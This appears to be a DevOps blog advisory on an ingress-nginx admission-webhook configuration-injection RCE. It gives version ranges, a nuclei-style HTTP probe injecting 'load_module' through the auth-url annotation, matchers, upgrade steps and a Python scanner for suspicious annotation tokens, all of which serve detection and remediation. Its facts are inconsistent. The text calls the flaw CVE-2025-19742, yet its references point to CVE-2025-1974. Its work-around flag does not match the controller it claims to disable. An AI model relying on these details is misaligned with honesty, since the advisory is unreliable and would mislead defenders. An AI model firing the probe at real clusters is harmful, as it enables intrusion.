Critical Ingress‑NGINX RCE Vulnerability (CVE‑2025‑19742): Impact, Exploit Details, and Fixes

A severe security flaw in the ingress‑nginx controller (CVE‑2025‑19742) allows unauthenticated attackers to inject malicious NGINX configuration via the auth‑tls‑match‑cn annotation, leading to remote code execution, secret leakage, and potential full Kubernetes cluster takeover, with detailed remediation steps provided.

Full-Stack DevOps & Kubernetes

Vulnerability Overview

The community recently disclosed a critical security vulnerability affecting the ingress-nginx controller in Kubernetes clusters. An unauthenticated attacker can execute arbitrary code by exploiting improper handling of the auth-tls-match-cn annotation, which lets malicious configuration be injected into NGINX.

⚠️ By default, the ingress‑nginx controller can read Secrets across the entire cluster; if compromised, it may lead to full cluster takeover.

Affected Versions

Versions before v1.11.0

v1.11.0 to v1.11.4

v1.12.0

Verify deployment with:

kubectl get pods --all-namespaces --selector app.kubernetes.io/name=ingress-nginx

Vulnerability Details

CVE ID: CVE-2025-19742

Severity: Critical

CVSS Score: 9.8 (CVSS 3.1)

Type: Configuration injection / Privilege escalation / Remote code execution

Root Cause: The nginx.ingress.kubernetes.io/auth-url and auth-tls-match-cn annotations do not properly sanitize malicious content such as load_module, allowing it to be written into the NGINX config and executed.

Proof‑of‑Concept Metadata

id: CVE-2025-19742
name: Ingress-Nginx Controller - Remote Code Execution
author: iamnoooob, rootxharsh, pdresearch
severity: critical
description: |
  A security issue was discovered in ingress-nginx where the `auth-tls-match-cn` Ingress annotation can be used to inject configuration into nginx. This can lead to arbitrary code execution...
impact: |
  Vulnerable versions can be exploited to gain unauthorized access to all secrets...
remediation: |
  Update to one of the following versions: 1.12.1 or later / 1.11.5 or later

Exploit Payload (HTTP Request)

POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{
  "kind": "AdmissionReview",
  "apiVersion": "admission.k8s.io/v1",
  "annotations": {
    "nginx.ingress.kubernetes.io/auth-url": "http://example.com#;load_module test;\n"
  }
}

The payload forges an AdmissionReview object that injects a malicious annotation. The # character bypasses URI validation, and ;load_module attempts to load a module or trigger command execution.

Matchers

matchers:
  - type: word
    part: body
    words:
      - 'AdmissionReview'
      - 'directive is not allowed here'
      - 'load_module'
    condition: and

Potential Impact

Unauthenticated remote command execution.

Access to and leakage of all Secrets readable by the controller.

Possible full cluster takeover, compromising confidentiality, integrity, and availability.

Risk of persistent backdoor implantation.

Mitigation

Upgrade (preferred)

Upgrade the ingress‑nginx controller to one of the following fixed versions (or newer):

v1.11.5 or newer

v1.12.1 or newer

Helm upgrade example:

helm upgrade ingress-nginx ingress-nginx/ingress-nginx \
  --namespace ingress-nginx \
  --set controller.image.tag=v1.12.1

Temporary Work‑around

If upgrading is not immediately possible, disable the Admission Webhook controller:

--enable-admission-plugins=""

Disabling the webhook may affect other security or compliance policies that rely on it.

Security Recommendations

Audit all Ingress resources for suspicious annotations containing #, ;, or load_module.

Restrict the ingress‑nginx controller’s permission to read Secrets only when necessary.

Enable audit logging to track changes to Ingress objects.

Use runtime security tools (e.g., OPA, Kyverno) to whitelist allowed annotations.

Perform regular security baseline scans and monitor controller behavior.
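As an added example (not code from the original post), the Python helper below turns two of the recommendations above into checks: it applies the "Affected Versions" ranges to a controller image tag, and it scans the JSON from kubectl get ingress -A -o json for the auth annotations carrying the #, ; or load_module tokens the post says to audit for. The sample Ingress list and the function names are constructed for illustration.

```python
import re
# Fixed releases named in the post; earlier patch levels on the same minor line are affected.
FIXED = {(1, 11): (1, 11, 5), (1, 12): (1, 12, 1)}
# The annotations the post names as the injection vector, and the tokens it says to audit for.
AUTH_ANNOTATIONS = ("nginx.ingress.kubernetes.io/auth-url",
                    "nginx.ingress.kubernetes.io/auth-tls-match-cn")
SUSPICIOUS_TOKENS = ("#", ";", "load_module")

def parse_tag(tag):
    """Turn an image tag such as 'v1.12.1' into a comparable (major, minor, patch) tuple."""
    m = re.match(r"v?(\d+)\.(\d+)\.(\d+)", tag)
    if not m:
        raise ValueError(f"unrecognised ingress-nginx image tag: {tag}")
    return tuple(int(x) for x in m.groups())

def is_vulnerable(tag):
    """True when the tag falls inside the ranges listed under 'Affected Versions'."""
    ver = parse_tag(tag)
    fixed = FIXED.get(ver[:2])
    if fixed is None:
        # No fixed release on this minor line: everything before 1.11.0 is affected, later lines are not.
        return ver < (1, 11, 0)
    return ver < fixed

def find_suspicious(ingress_list):
    """Scan `kubectl get ingress -A -o json` output; return (namespace, name, key, value)
    for every auth annotation that carries one of the suspicious tokens."""
    hits = []
    for item in ingress_list.get("items", []):
        meta = item["metadata"]
        for key, value in (meta.get("annotations") or {}).items():
            if key in AUTH_ANNOTATIONS and any(t in value for t in SUSPICIOUS_TOKENS):
                hits.append((meta.get("namespace"), meta["name"], key, value))
    return hits

# Constructed sample: one Ingress carrying the post's auth-url payload, two benign ones.
SAMPLE_INGRESSES = {"items": [
    {"metadata": {"namespace": "shop", "name": "web", "annotations": {
        "nginx.ingress.kubernetes.io/auth-url": "http://example.com#;load_module test;\n"}}},
    {"metadata": {"namespace": "shop", "name": "api", "annotations": {
        "nginx.ingress.kubernetes.io/rewrite-target": "/"}}},
    {"metadata": {"namespace": "blog", "name": "site"}},
]}

if __name__ == "__main__":
    for ns, name, key, value in find_suspicious(SAMPLE_INGRESSES):
        print(f"{ns}/{name}: {key} = {value!r}")
    for tag in ("v1.11.4", "v1.11.5", "v1.12.0", "v1.12.1"):
        print(tag, "VULNERABLE" if is_vulnerable(tag) else "fixed")
```

A hit only means the annotation deserves a look: legitimate auth-url values can contain # fragments, so review each flagged Ingress by hand before deleting it.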

References

Kubernetes blog announcement: https://kubernetes.io/blog/2025/03/24/ingress-nginx-cve-2025-1974/

NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2025-1974

Written by

Full-Stack DevOps & Kubernetes

Focused on sharing DevOps, Kubernetes, Linux, Docker, Istio, microservices, Spring Cloud, Python, Go, databases, Nginx, Tomcat, cloud computing, and related technologies.
